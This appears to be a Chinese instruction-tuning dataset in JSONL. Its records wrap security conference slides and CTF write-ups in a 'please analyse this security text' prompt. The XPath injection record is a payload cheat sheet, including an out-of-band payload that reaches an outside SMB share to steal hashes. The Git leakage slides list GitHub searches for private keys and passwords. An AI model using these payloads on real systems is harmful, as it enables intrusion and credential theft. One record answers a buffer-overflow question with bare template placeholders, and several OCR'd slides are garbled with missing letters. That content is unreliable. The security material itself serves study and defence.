their private email address, secret question like favorite pet and answer like fluffy Problem #1: Neglecting to read and redact data sets before releasing! Torontos 311 Customer Requests System 25% are about garbage/recycling pickup Some are serious, personal etc. Location is supposed to be reported as partial postal code e.g. M4Vxxx, but e.g. WOLFE AVE & DANFORTH RD If there are enough of these slip ups, combined", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# XPATH Injection > XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. ## Summary * [Exploitation](#exploitation) * [Blind exploitation](#blind-exploitation) * [Out Of Band Exploitation](#out-of-band-exploitation) * [Tools](#tools) * [References](#references) ## Exploitation Similar to SQL : `\"string(//user[name/text()='\" +vuln_var1+ \"' and password/text()=\" +vuln_var1+ \"']/account/text())\"` ```sql ' or '1'='1 ' or ''=' x' or 1=1 or 'x'='y / // //* */* @* count(/child::node()) x' or name()='username' or 'x'='y ' and count(/*)=1 and '1'='1 ' and count(/@*)=1 and '1'='1 ' and count(/comment())=1 and '1'='1 search=')] | //user/*[contains(*,' search=Har') and contains(../password,'c search=Har') and starts-with(../password,'c ``` ## Blind Exploitation 1. Size of a string ```sql and string-length(account)=SIZE_INT ``` 2. Extract a character ```sql substring(//user[userid=5]/username,2,1)=CHAR_HERE substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) ``` ## Out Of Band Exploitation ```powershell http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE') ``` ## Tools - [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents - [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool - [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text - [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer) - [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool ## References * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)) * [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@patrickwardle STICK THAT IN YOUR (ROOT)PIPE & SMOKE IT leverages the best combination of humans and technology to discover security vulnerabilities in our customers web apps, mobile apps, and infrastructure endpoints WHOIS @patrickwardle always looking for more experts! xpc, rootpipe, malware, patches & 0days :) OUTLINE overview of XPC the bug in malware patch bypass patch(es) Credits hax0ring is rarely an individual effort Ian Beer Emil Kvarnhammar Pedro Vilaça uncovered rootpipe Jonathan Levin \"Mac OS X & iOS Internals\" @emilkvarnhammar @osxreverser implants backdoor remotely accessible means of providing secret control of device injection coercing a process to load a module persistent malicious code hooking intercepting function calls trojan malicious code that masquerades as legitimate gotta make sure were all on the same page ;) SOME DEFINITIONS OVERVIEW OF XPC modern IPC on OS X a simple IPC mechanism which can provide security & robustness XPC There are two main reasons to use XPC: privilege separation and stability. -apple.com sandboxed 'XPC services' [privilege separation] [stability] each XPC service has its own sandbox crashes in the XPC services don't affect the app used all over the place by Apple XPC IN OS X $ find /System/Library/Frameworks -name \\*.xpc AddressBook.framework/Versions/A/XPCServices/com.apple.AddressBook.FaceTimeService.xpc AddressBook.framework/Versions/A/XPCServices/com.apple.AddressBook.MapLauncher.xpc ... WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.Plugin.32.xpc WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.Plugin.64.xpc WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc $ find /Applications -name \\*.xpc iPhoto.app/Contents/XPCServices/com.apple.PhotoApps.AVCHDConverter.xpc iPhoto.app/Contents/XPCServices/com.apple.photostream-agent.VideoConversionService.xpc Xcode.app/Contents/Developer/Toolchains/.../XPCServices/SourceKitService.xpc Xcode.app/Contents/XPCServices/com.apple.dt.Xcode.Pla", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 route分析 2022年52115:07:15 最近在重构优化stowaway的代码之前没有细看的header结构体的route字段的作实际上这个字段 就是以实现多级代理中和每个节点的通信的重要参数 般来说不管是哪个node发送消息给adminRoute般只要设置成TEMP_ROUTE当然Sender和 Accepter是来判断发送者和接收者的UUID 这不需要Route是因为每个node只会有个上游node和多个下游node所以你发送给上游node 的时候并不会迷路只有条路通往admin 2 admin发送消息给某个多级node的时候就需要路由帮忙了虽然SenderAccepter可以确认发送和 接收者但某个节点在拿到消息的时候并不能确定要发送给哪个下游node才能到达最终指定node 如下admin要发送消息给node2那node0怎么知道是应该发送给node1还是node4 node0只知道他路由两个节点孙节点就不得知了 但是作为admin既然能打印如下拓扑图那么他然是有各个node之间的关系只需要有个包 来管理node信息就他也确实是这么做的 3 有个topology包来做node管理通过把指定node的UUID发送给topology则可获取到他对应的 route以下是通过channel来通信的为了线程安全 于topology内部的实现有兴趣的可以仔细看看 route的格式是怎样的呢如下在个node接收到消息发现不是发送给分发给childNode 时route是冒号隔开以每个node的UUID作为标识拼接起来我要发送的最终node的UUID在 Accepter刚好Route最后个UUID也是 4 这调changeRoute来提取下跳node的UUID并在在Route删除这样每跳只需要把 Route最前的UUID提取出来就是要发送的childNode 5 通过UUID获取childNode的conn连接对象从可以把消息成功发送给路由指定下的childNode 6 通过每跳从Route提取最开头的UUID来找到需要发送给的childNode并删除Route最开头UUID 来实现多级代理之间的数据传递这种式好的地就是每个node他需知道孙node是谁只需要根据 Route来判断直到Accepter是就不需要往childNode传递了 以上只是提供个思路吧不管是做多级代理具还是C2都可以做参考", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# john_pollard Cryptography, 500 points ## Description: > Sometimes RSA certificates are breakable Hints: * The flag is in the format picoCTF{p,q} * Try swapping p and q if it does not work ## Solution: Let's extract the public key from the attached certificate: ```console root@kali:/media/sf_CTFs/pico/john_pollard# openssl x509 -pubkey -noout -in cert.pem > key.pub root@kali:/media/sf_CTFs/pico/john_pollard# openssl rsa -pubin -in key.pub -text RSA Public-Key: (53 bit) Modulus: 4966306421059967 (0x11a4d45212b17f) Exponent: 65537 (0x10001) writing RSA key -----BEGIN PUBLIC KEY----- MCIwDQYJKoZIhvcNAQEBBQADEQAwDgIHEaTUUhKxfwIDAQAB -----END PUBLIC KEY----- ``` The modulus is really small, we can probably factor it. We can use the [FactorDB API](http://factordb.com/api/index.php?query=4966306421059967): ```json { \"id\": \"4966306421059967\", \"status\": \"FF\", \"factors\":[ [\"67867967\", 1], [\"73176001\",1] ] } ``` Or YAFU: ```console root@kali:/media/sf_CTFs/pico/john_pollard# yafu \"factor(4966306421059967)\" fac: factoring 4966306421059967 fac: using pretesting plan: normal fac: no tune info: using qs/gnfs crossover of 95 digits div: primes less than 10000 fmt: 1000000 iterations Total factoring time = 0.0189 seconds ***factors found*** P8 = 73176001 P8 = 67867967 ans = 1 ``` The flag: `picoCTF{73176001,67867967}`.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n实战攻防演习之 红队视角下的防御体系突破 1 实战攻防演习之 红队视角下的防御体系突破 3 前 言 网络实战攻防演习是新形势下关键信息系统网络 安全保护工作的重要组成部分演习通常是以实际运 行的信息系统为保护目标通过有监督的攻防对抗 最大限度地模拟真实的网络攻击以此来检验信息系 统的实际安全性和运维保障的实际有效性 2016年以来在国家监管机构的有力推动下网 络实战攻防演习日益得到重视演习范围越来越广 演习周期越来越长演习规模越来越大国家有关部 门组织的全国性网络实战攻防演习从2016年仅有几家 参演单位到2019年已扩展到上百家参演单位同时 各省各市各行业的监管机构也都在积极地筹备 和组织各自管辖范围内的实战演习一时间网络实 战攻防演习遍地开花 在演习规模不断扩大的同时攻防双方的技术水平 和对抗能力也在博弈中不断升级 2016年网络实战攻防演习尚处于起步阶段攻 防重点大多集中于互联网入口或内网边界 2017年实战攻防演习开始与重大活动的网络安 全保障工作紧密结合就演习成果来看从互联网侧 实战攻防演习之 红队视角下的防御体系突破 4 发起的直接攻击仍然普遍十分有效而系统的外层防 护一旦被突破横向移动跨域攻击往往都比较容 易实现 2018年网络实战攻防演习开始向行业和地方深 入伴随着演习经验的不断丰富和大数据安全技术的 广泛应用防守方对攻击行为的监测发现和溯源能 力大幅增强与之相应的攻击队开始更多地转向精 准攻击和供应链攻击等新型作战策略 2019年以来网络实战攻防演习工作受到了监 管部门政企机构和安全企业的空前重视流量分 析EDR蜜罐白名单等专业监测与防护技术被防 守队广泛采用攻击难度的加大也迫使攻击队全面升 级诸如0day漏洞攻击1day漏洞攻击身份仿冒 钓鱼WiFi鱼叉邮件水坑攻击等高级攻击手法在 实战攻防演练中均已不再罕见攻防演习与网络实战 的水平更加接近 如何更好地参与网络实战攻防演习如何更好地借 助实战攻防演习提升自身的安全能力这已经成为大 型政企机构运营者关心的重要问题 作为国内领先的网络安全企业奇安信集团已成为 全国各类网络实战攻防演习的主力军奇安信集团安 实战攻防演习之 红队视角下的防御体系突破 5 服团队结合200余次实战攻防演习经验总结编撰了这 套实战攻防演习系列丛书分别从红队视角蓝队视 角和紫队视角来解读网络实战攻防演习的要领以 及如何结合演习提升政企机构的安全能力 需要说明的是实战攻防演习中的红方与蓝方对抗 实际上是沿用了军事演习的概念和方法一般来说 红方与蓝方分别代表攻击方与防守方不过红方和 蓝方的名词定义尚无严格的规定也有一些实际的攻 防演习将蓝队设为攻击队将红队设为防守队在 本系列丛书中我们依据绝大多数网络安全工作者的 习惯统一将攻击队命名为红队将防守队命名为蓝 队而紫队则代表组织演练的机构 红队视角下的防御体系突破是本系列丛书的第 一本本书希望通过归纳总结红队常用的攻击策略和 攻击战术帮助政企机构理解攻方思维以便提升演 习水平构筑更有效的安全防御体系正所谓知己知 彼百战不殆 实战攻防演习之 红队视角下的防御体系突破 6 目 录 第一章 什么是红队 .....................................1 第二章 红队三板斧攻击的三个阶段............3 一第一阶段情报收集.......................................3 二第二阶段建立据点.......................................4 三第三阶段横向移动.......................................5 第三章 红队也套路常用的攻击战术............7 一利用弱口令获得权限.......................................7 二利用社工来进入内网.......................................8 三利用旁路攻击实施渗透.................................10 四秘密渗透与多点潜伏.....................................11 第四章 红队三十六计经典攻击实例..........14 一浑水摸鱼社工钓鱼突破系统..................14 实战攻防演习之 红队视角下的防御体系突破 7 二声东击西混淆流量躲避侦察..................17 三李代桃僵旁路攻击搞定目标..................19 四顺手牵羊巧妙种马实施控制..................21 五暗渡陈仓迂回渗透取得突破..................23 第五章 红队眼中的防守弱点....", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMEATPISTOL A Modular Malware Implant Framework Presened by: @ceyxies and @fzzynop Biographical Summary: ? HERE TO TALK ABOUT A GUN MADE OF MEAT ...THAT SHOOTS MALWARE BULLETS? This is a tool for... RED TEAM You mean \"Pentesting?\" \"Fundamentally a framework for creating, managing, and interacting with stealth implants that support persistent adversarial operations\" Red Team Operating Paradigm Scope: any sysems, hmans, or processes employed by he company #Yoloscope We choose he arges, se he rles of engagemen, we se as mch ime as necessary #NoScopeBias Seal sff for real, inciden responders rea s like we are real, ry no o ge cagh, ry o win by any means necessary Read o or resls o large adiences, branded operaions, craf propaganda Have an impac. Origin Story. New Job, who dis? Hey go hack sff case an impac Don ge cagh Go shell ye? fine. Js ge some malware and SE my arge o rn i. Ooops. All the decent malware was for windows. my_first_malware.jpg Snail Pyhon Based Reverse SSH Tnneling Tool Used wier for C2 resolion based on a lexicon Cronab or LanchDaemon persisence Random schedling Obfscaed Generaor scrip Worked Good For like a year. Problems Ble Team does no like geing wrecked by pyhon Problems Ble Team wries specific deecions for Red Team Problems Aribion of Red Team ges really good. Problems Abiliy o be a good Boogeyman goes down. Problems And we have a bnch of spaghei code. Time to iterate, write new malware Trles: Flly implemened SSH clien and server wrien in java Rio: Anoher SSH reverse nneling ool wrien flly in bash So great! New malware, new tricks DJ KHALED WE DA BESSSSS But, the status quo was... We ended p rewriing malware each ime we waned somehing new We had o sand p all or own C2 each ime We had o manage and configre all or C2 We had o manage all or keys and cerificaes for or C2 I ook ime and effor, and a lo of i AND... Is prone o errors: Accidenally resed a C2 which go s aribed Accidenally conneced o C2 from he wrong place Broken shells and broken dreams Sh", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNetwork Attack Visualization Greg Conti www.cc.gatech.edu/~conti Disclaimer The views expressed in this presentation are those of the author and do not reflect the official policy or position of the United States Military Academy, the Department of the Army, the Department of Defense or the U.S. Government. image: http://www.leavenworth.army.mil/usdb/standard%20products/vtdefault.htm information visualization is the use of interactive, sensory representations, typically visual, of abstract data to reinforce cognition. http://en.wikipedia.org/wiki/Information_visualization An Art Survey http://www.artinvest2000.com/leonardo_gioconda.htm http://www.geocities.com/h2lee/ascii/monalisa.html http://www.muppetlabs.com/~breadbox/bf/ http://www.clifford.at/cfun/progex/ A B C  Helps find patterns  Helps reduce search space  Aids efficient monitoring  Enables interaction (what if)  Help prevent overwhelming the user Why InfoVis? So What?  Go Beyond the Algorithm  Help with detecting and understand some 0day attacks  Make CTF and Root Wars a Spectator Sport  Help find insider threats  Stealth might not be so stealthy  Help visually fingerprint attacks/tools What tasks do you need help with? TCP Dump Tcpdump image: http://www.bgnett.no/~giva/pcap/tcpdump.png TCPDump can be found at http://www.tcpdump.org/ Ethereal image: http://www.linux- france.org/prj/edu/archinet/AMSI/index/images/ethereal.gif Ethereal by Gerald Combs can be found at http://www.ethereal.com/ EtherApe image: http://www.solaris4you.dk/sniffersSS.html Etherape by Juan Toledo can be found at http://etherape.sourceforge.net/ Ethereal EtherApe Packet Capture Visualizations 3D TraceRoute 3D TraceRoute Developer: http://www.hlembke.de/prod/3dtraceroute/ XTraceRoute Developer: http://www.dtek.chalmers.se/~d3august/xt/ Xtraceroute basic traceroute/tracert traceroute Visualizations Intrusion Detection System Types  Host-based intrusion-detection is the art of detecting malicious activity within a single computer by usin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBreaking Bluetooth By Being Bored JP Dunning DefCon 2010  Shadow Cave LLC JP Dunning Graduate Student: Computer Science, Virginia Tech Research Focus: Wireless and Portable Security Website: www.hackfromacave.com  Shadow Cave LLC  Shadow Cave LLC Bluetooth  IEEE 802.15.1  Low Power / Short Range  Ad-Hoc (Piconet)  Deployed on over 1 billions devices worldwide  Shadow Cave LLC Obfuscation and Reconnaissance  Shadow Cave LLC Cloning/Spoofing Profile  Bluetooth Profile:  Device Address, Device Class, Device Name  Bluetooth Profile Cloning:  Modify host Bluetooth Adapter profile to match the profile of another device  Done manually using hciconfig and bdaddr  Bluetooth Profile Spoofing:  Creating a misleading profile of host Bluetooth Adapter  Shadow Cave LLC SpoofTooph  Automate / simplify Bluetooth profile modification process  Useful for  Obfuscation  Impersonations  Observation  5 different modes  Shadow Cave LLC SpoofTooph  Mode 1: > spooftooph -i hci0 -s -d scan.log  Scan local area for devices  Save list of devices found  Select a device from the list to clone  Mode 2: > spooftooph -i hci0 -r  Randomly generate Bluetooth profile  Device Class  Random Valid Class  Device Name - 100 most popular Ameraican names + device type  Device Addr  Random MAC  Shadow Cave LLC SpoofTooph  Mode 3: > spooftooph -i hci0 -n new_name -a 00:11:22:33:44:55 -c 0x4a010c  Specify Name, Class, and Address  Mode 4: > spooftooph -i hci0 -l scan.log  Read in previously logged scan  Select a device from the list to clone  Mode 5: > spooftooph -i hci0 -t 10  Incognito: Scan for devices every X seconds and clone the first profile on the list  Shadow Cave LLC SpoofTooph  Shadow Cave LLC Bluetooth Profiling Project  Collect Device Name, Device Address and Device Class on as many devices as possible  Same idea as Josh Wright's Bnap,Bnap, but collecting device profiles from others devices instead  Collected over 1,500 device profiles so far  Shadow Cave LLC Bluetooth Profiling Project  Use for th", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCOPYRIGHT 2006 McAfee Inc.  Fuzzing XML Based Protocols (SAML) Hacks-In-Taiwan 2006 Yen-Ming Chen Senior Principal Consultant Foundstone, A Division of McAfee 2 COPYRIGHT 2006 McAfee Inc. Agenda  Introduction  SAML  OpenSAML  Scenarios  Implementation  Conclusion 3 COPYRIGHT 2006 McAfee Inc. SAML  Security Assertion Markup Language (SAML)  Codified by OASIS with participation from MACE and others  Defines XML Schema for AuthN and attribute assertions, queries, responses, and use profiles such as Web SSO.  Defines bindings to protocols for transport  V2.0 expands SAML and includes definitions from Shibboleth and the Liberty Alliance 4 COPYRIGHT 2006 McAfee Inc. SAML in a Nutshell  An XML-based framework for exchanging security information  XML-encoded security assertions  XML-encoded request/response protocol  Rules on using assertions with standard transport and messaging frameworks  An OASIS standard (1.0, 1.1, and 2.0)  Vendors and users involved  OpenSAML implementation available  Codifies current system outputs vs. creating new technology 5 COPYRIGHT 2006 McAfee Inc. OpenSAML  OpenSAML for the message and assertion formats, and protocol bindings which is based on Security Assertion Markup Language (SAML)  SAML (Security Assertion Markup Language) is a standard for the formation and exchange of authentication, attribute, and authorization data as XML. It describes various kinds of messages and standard ways of transporting them.  OpenSAML is a set of open-source libraries in Java and C++ which can be used to build, transport, and parse SAML messages. 6 COPYRIGHT 2006 McAfee Inc. Technology  Basic concepts  Subject/principal  User or application requesting access to a resource  Assertion  Set of statements about a subject  Authority  Entity that produces and/or consumes assertions  Binding  Specification for transporting assertions as protocol payloads  Profile  Specification describing rules for embedding, transferring, extracting, and processing assertions 7 COP", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Theyre Hacking Our Clients! Introducing Free Client-side Intrusion Prevention Jay Beale Creator - Bastille UNIX Co-Founder - Intelguardians, Inc. Copyright 2008 Jay Beale Intelguardians, Inc 2 Copyright 2008 Jay Beale Intelguardians, Inc. Penetration Testing I work for Intelguardians, a security consulting firm. I get to do and lead a fair bit of network and application penetration testing. A penetration test usually focuses on the compound question: could a hacker break in from the Internet and how far could he go? The hard part is getting into the internal network. Once youre inside, things get far, far easier. 3 Copyright 2008 Jay Beale Intelguardians, Inc. Target: Internal Network Our penetration tests get much, much easier from the internal network. Most organizations architect their firewalls for three zones: Internet, DMZ, and Internal networks. From any machine in the Internal network, we usually have an extreme level of access. 4 Copyright 2008 Jay Beale Intelguardians, Inc. A Curious Trend in Ethical Hacking Over the last year, were finding that compromising the Internet-accessible servers has gotten far more difficult. Increasingly, weve been getting to the internal network via client-side attack, hacking the Security or IT staffs workstations via vulnerabilities in their browsers, mail clients, Acrobat and Office programs. These attacks have gotten easier for anyone with a copy of Core IMPACT, Metasploit, or hostile attacker toolkits. 5 Copyright 2008 Jay Beale Intelguardians, Inc. Hacking Acrobat Reader Our clients choose the scope of targeting, often allowing us to target only the Security staff. On a penetration test for a company about a year ago, we were allowed to target only one IT Security person. He was a tough cookie: IE7 and well-patched. We used every single client-side exploit. We compromised his machine with the last exploit, which targeted Acrobat Reader. But that was enough. You only need one. 6 Copyright 2008 Jay Beale Intelguardians, ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWarBallooning  Kismet Wireless Eye in the Sky Presented by: Rick Hill DEFCON 16 Sunday, Aug. 10 WarBallooning Concept Thanks for coming! WarDriving limited visibility in the city $4.00 / Gallon gas means driving less Balloon  better platform than rocket Perfect for covering 5 - 10 mile Urban Areas Questions during talk welcome Project in a Nutshell Evolved from WarRocketing DC14 Good, Bad comparison WarBalloon components Hardware Hacks involved Network Layout & Security Flying the WarBalloon DEFCON 14 Evolved from WarRocketing DC14 DEFCON 16 New Platform: Balloon vs. Rocket The Rocket was a novel concept, but  Explosives permits reqd  Launch only in rural areas  Stumbling limited to parachute drift time Balloon  Helium cost $20/ lb. payload lift  More accepted by authorities  Still restricted near airports 1st Design Sketch  Traffic Cone Design Considerations All components light weight Low Power consumption Safety (H2 = Hindenburg) Wireless SW must be passive - Kismet Secure Network Hardware Components Balloon: Professional Aerial Photography WRT54G, v2 Dlink 5220 Security Camera Fiber Optic Transceivers Yagi Antenna, Omni Antenna Container: thank you Igloo Cooler Co! Software Components Kismet Server, Drone Talisman 1.3.6 Web Browser: Dlink 5220 view & control Suse Linux Flite Festival Speech Synthesis Sofware Kismac UNIX utilities: ssh v2, etc. HW / SW Hacks WRT54G  install Talisman, ssh, Kismet drone Move antenna connector Remove case Mount in Igloo Mini-Mate HW / SW Hacks WRT54G HW / SW Hacks DLink 5220 Camera  install antenna Igloo Mount HW / SW Hacks Fiber Optic Link Inherently Secure High Bandwidth Low Weight  50 meters / 1.5 lbs Use regular multimode fiber HW / SW Hacks Fiber Optic Transceiver  Case removal HW / SW Hacks Completed Payload IP Based Robotics DLINK 5220 consists of a CCD camera, web server, and pan & tilt controller As the Pan motor is quite strong, were using it to aim the high gain antenna @ stumbling targets Speed, camera focus, snapshots, ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请解释缓冲区溢出的原理和防护方法", "input": "", "output": "缓冲区溢出是一种常见的网络安全威胁。攻击原理：[具体原理说明]。防护措施：1. [防护方法1] 2. [防护方法2] 3. [防护方法3]", "category": "security_knowledge", "source": "manual"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Acquiring .NET Objects from the Managed Heap Topher Timzen Southern Oregon University Cybersecurity Research Lab F ABSTRACT This paper will describe how to use instantiated objects on the .NET CLR Managed Heap as if they were declared locally. It will be shown that by referencing an object pointer from the Managed Heap, an attacker can take control over any object being used in an application. Reflective techniques will be discussed and a signature will be introduced to find objects on the Managed Heap. 1 INTRODUCTION The .NET Framework uses the Common Lan- guage Runtime, CLR, to manage the execution of .NET programs. There are 4 major versions of the CLR available and multiple .NET versions within each [2]. | CLR Version | .NET Version | ||| | 1.0 | 1.0 | | 1.1 | 1.1 | | 2.0 | 2 . 0 , 3 . 0 , 3.5 | | 4.0 | 4 . 0 , 4.5 | For the purpose of this paper, only CLR versions 2.0 and 4.0 will be discussed as the author feels 1.0 and 1.1 are not relevant for attacking modern applications. Using Reflection [4] key information about an object can be discovered. A plethora of information in objects is useful for attacking or reverse engineering such as a list of fields, instance methods, static methods and variables that an object contains. Furthermore, once an object is locally accessible an attacker can ma- nipulate it in any way they want. Any object can be instantiated using reflec- tion. While that local reference is not neces- sarily usable by an attacker, it can be used to reveal both the signature of all objects of that class and the memory location of the Managed Heap, bypassing any Address Space Layout Randomization, ASLR. All instantiated objects from a specific class share the same Method Table (MT) pointer, which will be used later to locate objects on the Managed Heap. Once the MT for a specific class is known and the Managed Heap discovered, an attacker can scan through the Managed Heap to locate all objects instantiated from a specific class and use them locally. To ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# DES (Crypto 500) ###ENG [PL](#pl-version) The general idea was simple - the authors used double encryption with DES and Blowfish and the task was to decode the message. The problems: * Authors used some shady website for encryption and not the ciphers directly. This website was adding random paddings and without knowing about it, there was no way to solve it. Fortunately this was released as a hint. * The authors for no apparent reason have given an example payload apart from the flag. This suggested a meet-in-the-middle attack using this payload, which was not a good approach, because the example payload was encrypted with different keys than the flag. * The calculations for this task were a bit time consuming due to key universum size. Seriously, there is no need to make a task where bruteforce is taking minutes to run on 8 paralell cores. It doesn't make the task any \"harder\", only more annoying. So what we have here is the encrypted flag: ``` AiEjLYxiRUlgG+OYaYje5HOwvS8UFegdXRrCsIiy6pBH67fDvGbLF/gtZihyW7WYVOrsi7/N1sgaVUBU/VW1NwEOrOhguZZfP5T7Gw88sMx9KFepLfsjOLPKKVUuMbVu6Lno0FJjbU+7ft1VtdsQhAh1Lc91SDcduoI3J1FwffwwEwy1L7FKjg14LZ9fgaMF5c43T8avL+bpOBDFHiPzK1Mwv4ftVt6k5UV13cPV3VLm+Jx7Q/7LLamyQLLUU0O1pcKZOHi7oYPngpFh7VmIPIJwCsmoCAyt8+yC/uqNgpfUoD0SHfG7tvz7F8sZKL6RfezLvFN++8B+rs+6AGOiSHCmnGbO4PNcOdZfWP4lYZQRIZ/DTN4ntg== ``` And we know that the flag was encrypted first with DES with padding, the data were transformed into base64 and this was encrypted again with Blowfish with padding and it was encoded as base64. We also know that both keys are in the range 0-9999999. So we run bruteforce first on the outer layer - to decode Blowfish and take all proper base64 results as potential hits. And then we take those results and try to decode them with DES to look for the flag. There is slim chance that such long payload decoded with improper Blowfish key would give us base64 string, and in fact we got only a single hit there. So we run the bruteforecer: ```python import base", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2015.11 by phithon 被Git打破的 企業安全大門 Who am I  phith0n  乌云核心白帽子/XDSEC成员  从事Web安全/运维安全研究 What is GIT 刪除 增加 增加 phithon@fake-demo:~$ git add . phithon@fake-demo:~$ git commit Finish Git是一个分布式版本控制软件 在开发中运用git可以方便地进行团队协作敏捷开发 GIT与信息安全  Github造成的企业敏感信息泄露  web目录/.git/访问造成的源码泄露  内网Git未授权访问造成敏感信息泄露  Github造成的企业敏感信息泄露  web目录/.git/访问造成的源码泄露  内网Git未授权访问造成敏感信息泄露 当最單純的人遇上了最邪惡的人 案例 / 某电商宁手机客户端源码泄露 案例 / 某电商宝内网邮箱泄露导致漫游 http://www.wooyun.org/bugs/wooyun-2014-062243 Github Hacking Skill  关键词搜索: password@domain.comsaltBEGIN RSA PRIVATE KEYsmtp  @domain-inc.com in:file 在所有代码中搜索内网邮箱  id_rsa in:path 获得结果18534个  password language:yaml 获得结果784327个  password size:<100 language:php 利用常见情况搜索  smtp file:config extension:php 组合条件搜索  include($_GET[]); 搜索可能存在任意文件包含漏洞的代码  开源诚可贵安全价更高  对密码的敏感性  .gitignore的重要性  Github造成的企业敏感信息泄露  web目录/.git/访问造成的源码泄露  内网Git未授权访问造成敏感信息泄露  Github造成的企业敏感信息泄露  web目录/.git/访问造成的源码泄露  内网Git未授权访问造成敏感信息泄露 从GIT原理講起 为什么我们能够从泄露的.git目录还原出网站源 码 git init git add . git commit 1创建.git目录 2初始化.git目录写入config等文件 3为每一个改动的文件目录创建git object 4建立commit类型objects 5更新HEAD指向的revision git objects文件格式 git objects文件格式 blob blob 25\\x00This is the README file.\\n tree tree 192\\0 40000 admin\\0 a84943494657751ce187be401d6bf59ef7a2583c 40000 static\\0 14f589a30cf4bd0ce2d7103aa7186abe0167427f 40000 core\\0 ec559319a263bc7b476e5f01dd2578f255d734fd 100644 index.php\\0 97e5b6b292d248869780d7b0c65834bfb645e32a 40000 application\\0 6e63db37acba41266493ba8fb68c76f83f1bc9dd git objects還原 方法2 读取并解析objects从blob中提取源文件 方法3 解析并依次下载objects执行git reset还原源文件 方法1 读取并解析.git/index依次下载所有文件 最優 git  ls-tree  <revision>  列出tree对象的所有子对象 方法3 解析并依次下载objects执行git reset还原源文件 git  cat-file  -p  <revision>  列出blob对象的内容 git  reset  还原整个GIT环境较其他两法的优势 找到commit id 找到并下载tree 下载blob git reset 恢复源文件 GitRefs 运行演示 http://v.qq.com/ page/y/e/l/ y0171fyrxel.htm l 案例  WooYun-2015-133666 百度某站漏洞导致敏感信息泄 露Getshell(涉及至少66W+的用户数据含密码可内网)  WooYun-2015-121319 PHP官方多个分站存在git信息 泄露可读取大量程序源码  WooYun-2015-117925 盛大某站源码泄露Getshell直 入内网  WooYun-2015-114272 百度从git信息泄露到getshell 漫游内", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAll your family secrets belong to us - Worrisome security issues in tracker apps Siegfried Rasthofer | Fraunhofer SIT, Germany Stephan Huber | Fraunhofer SIT, Germany DefCon26, August 11th 2018 Who are we?  Head of Department Secure Software Engineering  PhD, M.Sc., B.Sc. in computer science  Static and Dynamic Code Analysis  Founder of @TeamSIK and @CodeInspect  Security Researcher @Testlab Mobile Security  Code Analysis Tool development  IOT Stuff  Founder of @TeamSIK Siegfried Stephan 2 Who are we?  Head of Department Secure Software Engineering  PhD, M.Sc., B.Sc. in computer science  Static and Dynamic Code Analysis  Founder of @TeamSIK and @CodeInspect  Security Researcher @Testlab Mobile Security  Code Analysis Tool development  IOT Stuff  Founder of @TeamSIK Siegfried Stephan (creds to: Alex, Daniel, Julien, Julius, Michael, Philipp, Steven, Kevin, Sebald, Ben) 3 Team 4 Beer Announcement 5 Agenda 6  Introduction/Motivation  Background Information  Bad Client-Side Checks with SharedPreferences  Client-Side and Communication Vulnerabilities  Server-Side Vulnerabilities  Responsible Disclosure Process  Summary Agenda 7  Introduction/Motivation  Background Information  Bad Client-Side Checks with SharedPreferences  Client-Side and Communication Vulnerabilities  Server-Side Vulnerabilities  Responsible Disclosure Process  Summary Surveillance - Then 1960: Radio receiver inside pipe 1960: Camera inside a pack of cigarettes 1970: Microphone inside a dragonfly 1990: Microphone inside a fake catfish * Source: http://www.businessinsider.com/ 8 Surveillance - Now 9 Sypware/RAT Surveillance - Now 10 Benign Reasons? Sypware/RAT Surveillance - Now 11 Benign Reasons? Family Couple Friends Good vs. Bad 12 Family Couple Friends Sypware/RAT Surveillance - Apps 13 Google PlayStore Android Security Report 2017 Surveillance - Apps 14 Google PlayStore *Android Security Report 2017 15 How 